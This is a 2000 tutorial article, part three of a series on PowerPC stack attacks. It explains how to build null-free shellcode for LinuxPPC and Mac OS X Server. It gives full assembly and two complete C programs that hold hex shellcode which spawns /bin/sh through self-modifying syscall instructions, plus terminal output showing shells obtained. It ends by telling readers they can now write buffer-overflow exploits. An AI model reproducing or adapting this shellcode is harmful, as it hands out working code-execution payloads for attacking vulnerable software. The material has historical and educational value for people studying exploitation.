PowerPC Stack Attacks, Part 3 - June 5, 2000
Christopher A Shepherd <cshepher@linux-florida.com>

In the last installment, we got pretty close, developing our own eggshell code, with one lil problem! It had zeroes in it. Of course, strcpy(), gets(), and all our other favorite insecure functions are going to choke on those zeroes, so we must do what we can do to get around having zeroes in our code. The horrifying explanation follows here.

First, a look at the original code:
100003e4:       48 00 00 30     b       10000414 <.ahead>
100003e8 <.back>:
100003e8:       7c 08 02 a6     mflr    r0
100003ec:       7c 01 03 78     mr      r1,r0
100003f0:       90 01 00 08     stw     r0,8(r1)
100003f4:       7c 03 03 78     mr      r3,r0
100003f8:       38 81 00 08     addi    r4,r1,8
100003fc:       38 a0 00 00     li      r5,0
10000400:       90 a1 00 0c     stw     r5,12(r1)
10000404:       38 00 00 0b     li      r0,11
10000408:       44 00 00 02     sc
1000040c:       38 00 00 01     li      r0,1
10000410:       44 00 00 02     sc
10000414 <.ahead>:
10000414:       4b ff ff d5     bl      100003e8 <.back>

How simple, how compact, how very few bytes. But look at how it works.

First, it does an unconditional branch, followed by a bl to discover the address of the string. Problem is, the 0x30 offset is encoded as '0x000030', which leaves us a few zeroes. Fortunately, we don't even need to do things that way. We were blr'ed to, and blr doesn't clear the link register, meaning that LR contains our address! All we have to do now is add the offset of the string to get its address. Witness:
                mflr    0       # r1 = .ourstrt since we were blr'ed to
                mr      1,0

Ahh, So easy. But look! Also, the li's, and the stw's, and the sc's all contain zeroes! So how do we implement an li? We have to do this:
		li	9,0x104
		addic	9,9,-0x103

This would store the value '1' in register r9, without having zeroes in any instruction. We end up doing this quite a bit. And the stw's get dealt with by using negative offsets as well.

But the big problem is the 'sc.' There is no way to generate that particular interrupt without that instruction. So we must use self-modifying code.

The resulting assembly-bloat is this:
/*
 *  Final LinuxPPC eggcode
 *  Christopher A Shepherd
 */

void main()
{
__asm__("
.ourstrt:
		mflr	0	# r1 = .ourstrt since we were blr'ed to
		mr	1,0
		li	9,0x4401
		addic	9,9,-1	# r8 = 0x4400
		li	10,0x0104
		addic	10,10,-0x102 # r9 = 0x0002
		addic	2,1,0x104+(.sc1-.ourstrt)
		sth	9,-0x104(2)
		sth	10,-0x102(2)		# write .sc1
		addic	2,1,0x104+(.sc2-.ourstrt)
		sth	9,-0x104(2)
		sth	10,-0x102(2)		# write .sc2
		addic	1,1,0x101+(.ourdat-.ourstrt)
		addic	1,1,-0x101
		mr	0,1	# r0 = r1 = /bin/sh
		addic	8,1,257 # r8 = r1 + 257
		stw	0,-249(8)  # string+8 contains address of string now
		mr	3,0	# r3 = ptr to /bin/sh
		addic	4,1,0x109	# r4 = r1+8 = ptr to ptr
		addic	4,4,-0x101
		xor	5,5,5   # r5 = 0 = NULL
		xor	6,6,6   # r6 = 0 for traps
		addic	8,1,257
		stw	5,-245(8) # null ptr in space after ptr
		xor	7,7,7
		addic	7,7,0x10c
		addic	7,7,-0x101
		mr	0,7
.sc1:		xor	7,7,7	# blah - zeroless placeholder
		xor	7,7,7
		addic	7,7,0x102
		addic	7,7,-0x101
		mr	0,7
.sc2:		xor	7,7,7	# blah - zeroless placeholder
.ourdat:
		.string	\"/bin/sh\"
");
}

... Which can compile into a nice neat little test program thus:
/*
 *  Complete LinuxPPC Buffer-Overflow Code
 *
 *  Christopher A Shepherd 
 *
 */
 
char shellcode[] = 
	"\x7c\x08\x02\xa6"		/*	mflr	r0		000 */
	"\x7c\x01\x03\x78"		/*	mr	r1,r0		004 */
	"\x39\x20\x44\x01"		/*	li	r9,17409	008 */
	"\x31\x29\xff\xff"		/*	addic	r9,r9,-1	016 */
	"\x39\x40\x01\x04"		/*	li	r10,260		020 */
	"\x31\x4a\xfe\xfe"		/*	addic	r10,r10,-258	024 */
	"\x30\x41\x01\x74"		/*	addic	r2,r1,372	028 */
	"\xb1\x22\xfe\xfc"		/*	sth	r9,-260(r2)	032 */
	"\xb1\x42\xfe\xfe"		/*	sth	r10,-258(r2)	036 */
	"\x30\x41\x01\x88"		/*	addic	r1,r1,392	040 */
	"\xb1\x22\xfe\xfc"		/*	sth	r9,-260(r2)	044 */
	"\xb1\x42\xfe\xfe"		/*	sth	r10,-258(r2)	048 */
	"\x30\x21\x01\x89"		/*	addic	r1,r1,393	052 */
	"\x30\x21\xfe\xff"		/*	addic	r1,r1,-257	056 */
	"\x7c\x20\x0b\x78"		/*	mr	r0,r1		060 */
	"\x31\x01\x01\x01"		/*	addic	r8,r1,257	064 */
	"\x90\x08\xff\x07"		/*	stw	r0,-249(r8)	068 */
	"\x7c\x03\x03\x78"		/*	mr	r3,r0		072 */
	"\x30\x81\x01\x09"		/*	addic	r4,r1,265	076 */
	"\x30\x84\xfe\xff"		/*	addic	r4,r4,-257	080 */
	"\x7c\xa5\x2a\x78"		/*	xor	r5,r5,r5	084 */
	"\x7c\xc6\x32\x78"		/*	xor	r6,r6,r6	088 */
	"\x31\x01\x01\x01"		/*	addic	r8,r1,257	092 */
	"\x90\xa8\xff\x0b"		/*	stw	r5,-245(r8)	096 */
	"\x7c\xe7\x3a\x78"		/*	xor	r7,r7,r7	100 */
	"\x30\xe7\x01\x0c"		/*	addic	r7,r7,268	104 */
	"\x30\xe7\xfe\xff"		/*	addic	r7,r7,-257	108 */
	"\x7c\xe0\x3b\x78"		/*	mr	r0,r7		112 */
	"\x44\xff\xff\xff"		/*	sc			116 */
	"\x7c\xe7\x3a\x78"		/*	xor	r7,r7,r7	120 */
	"\x30\xe7\x01\x02"		/*	addic	r7,r7,258	124 */
	"\x30\xe7\xfe\xff"		/*	addfic	r7,r7,-257	128 */
	"\x7c\xe0\x3b\x78"		/*	mr	r0,r7		132 */
	"\x44\xff\xff\xff"		/*	sc			136 */
	
	"\x2f\x62\x69\x6e\x2f\x73\x68\x00";	/*	/bin/sh \x00	144 */

void main() {
	int *ret;
	
	ret = (int *)&ret + 7;
	(*ret) = (int)shellcode;
	
	printf("Hi there.\n");
}

Whoa nellie! 144 bytes for a stack overflow! This is partially due to ppc's orthagonal 4-byte instructions, and partially due to the zeroes in the 'sc' instruction. It's a bitch, but I'm sure you could optimize it. It's not that well-done. It does however work in the above example. If your toolchain is like mine, and main() gets the same stack frame (and it should), you can compile and run this and get the same results as last time:
[cshepher@hal9000 egg]$ ./sploit2
Hi there.
sh-2.03$ 

Ahhh, but where do we go from here?

Where indeed. Let's talk about taking this to different powerpc operating systems that deserve just as much scrutiny as linuxppc. Look at Mac OS X Server.

When I cc -S to compile this very same source listing to an assembler file on Mac OS X Server, I get:
_main:
        mflr r0
        stmw r30,-8(r1)
        stw r0,8(r1)
        stwu r1,-80(r1)
        mr r30,r1

Oh boy. 80-byte stack frame. That means we change "&ret + 7" to "&ret + 8" (yeah I know, the toolchain works differently here). Now when we compile it, we're rewarded with:
[11:50pm] 64 [~]:cshepher@bondi% ./sploit2
Hi there.
Bad system call

Oh yeah. Different system call structure. If we look at /usr/include/sys/syscall.h, note that it says
/* 11 is obsolete execv */

Sucks to be us. Looks like we want 59, execve(). Let's try it. We go back to the sploit and use:
	addic	r7,r7,316
	addic	r7,r7,-257

To make r7 contain our call number, 59.

Compile it, and we get:
[11:57pm] 86 [~]:cshepher@bondi% ./sploit2
Hi there.
$

Gee, that was tough. The code to that looks like:
/*
 *  Complete Mac OS X Server Buffer-Overflow Code
 *
 *  Christopher A Shepherd 
 *
 */
 
char shellcode[] = 
	"\x7c\x08\x02\xa6"		/*	mflr	r0		000 */
	"\x7c\x01\x03\x78"		/*	mr	r1,r0		004 */
	"\x39\x20\x44\x01"		/*	li	r9,17409	008 */
	"\x31\x29\xff\xff"		/*	addic	r9,r9,-1	016 */
	"\x39\x40\x01\x04"		/*	li	r10,260		020 */
	"\x31\x4a\xfe\xfe"		/*	addic	r10,r10,-258	024 */
	"\x30\x41\x01\x74"		/*	addic	r2,r1,372	028 */
	"\xb1\x22\xfe\xfc"		/*	sth	r9,-260(r2)	032 */
	"\xb1\x42\xfe\xfe"		/*	sth	r10,-258(r2)	036 */
	"\x30\x41\x01\x88"		/*	addic	r1,r1,392	040 */
	"\xb1\x22\xfe\xfc"		/*	sth	r9,-260(r2)	044 */
	"\xb1\x42\xfe\xfe"		/*	sth	r10,-258(r2)	048 */
	"\x30\x21\x01\x89"		/*	addic	r1,r1,393	052 */
	"\x30\x21\xfe\xff"		/*	addic	r1,r1,-257	056 */
	"\x7c\x20\x0b\x78"		/*	mr	r0,r1		060 */
	"\x31\x01\x01\x01"		/*	addic	r8,r1,257	064 */
	"\x90\x08\xff\x07"		/*	stw	r0,-249(r8)	068 */
	"\x7c\x03\x03\x78"		/*	mr	r3,r0		072 */
	"\x30\x81\x01\x09"		/*	addic	r4,r1,265	076 */
	"\x30\x84\xfe\xff"		/*	addic	r4,r4,-257	080 */
	"\x7c\xa5\x2a\x78"		/*	xor	r5,r5,r5	084 */
	"\x7c\xc6\x32\x78"		/*	xor	r6,r6,r6	088 */
	"\x31\x01\x01\x01"		/*	addic	r8,r1,257	092 */
	"\x90\xa8\xff\x0b"		/*	stw	r5,-245(r8)	096 */
	"\x7c\xe7\x3a\x78"		/*	xor	r7,r7,r7	100 */
	"\x30\xe7\x01\x3c"		/*	addic	r7,r7,268	104 */
	"\x30\xe7\xfe\xff"		/*	addic	r7,r7,-257	108 */
	"\x7c\xe0\x3b\x78"		/*	mr	r0,r7		112 */
	"\x44\xff\xff\xff"		/*	sc			116 */
	"\x7c\xe7\x3a\x78"		/*	xor	r7,r7,r7	120 */
	"\x30\xe7\x01\x02"		/*	addic	r7,r7,258	124 */
	"\x30\xe7\xfe\xff"		/*	addfic	r7,r7,-257	128 */
	"\x7c\xe0\x3b\x78"		/*	mr	r0,r7		132 */
	"\x44\xff\xff\xff"		/*	sc			136 */
	
	"\x2f\x62\x69\x6e\x2f\x73\x68\x00";	/*	/bin/sh \x00	144 */

void main() {
	int *ret;
	
	ret = (int *)&ret + 8;
	(*ret) = (int)shellcode;
	
	printf("Hi there.\n");
}

I'm not going to optimize the code here for you, but there sure ass hell are a few places where you could save a few instructions in that shellcode. But I'm not going to do all that for you, just give you some working code. From here, you have everything you need to write k-rad spl0its for buffer overflows in these operating systems.

-Chris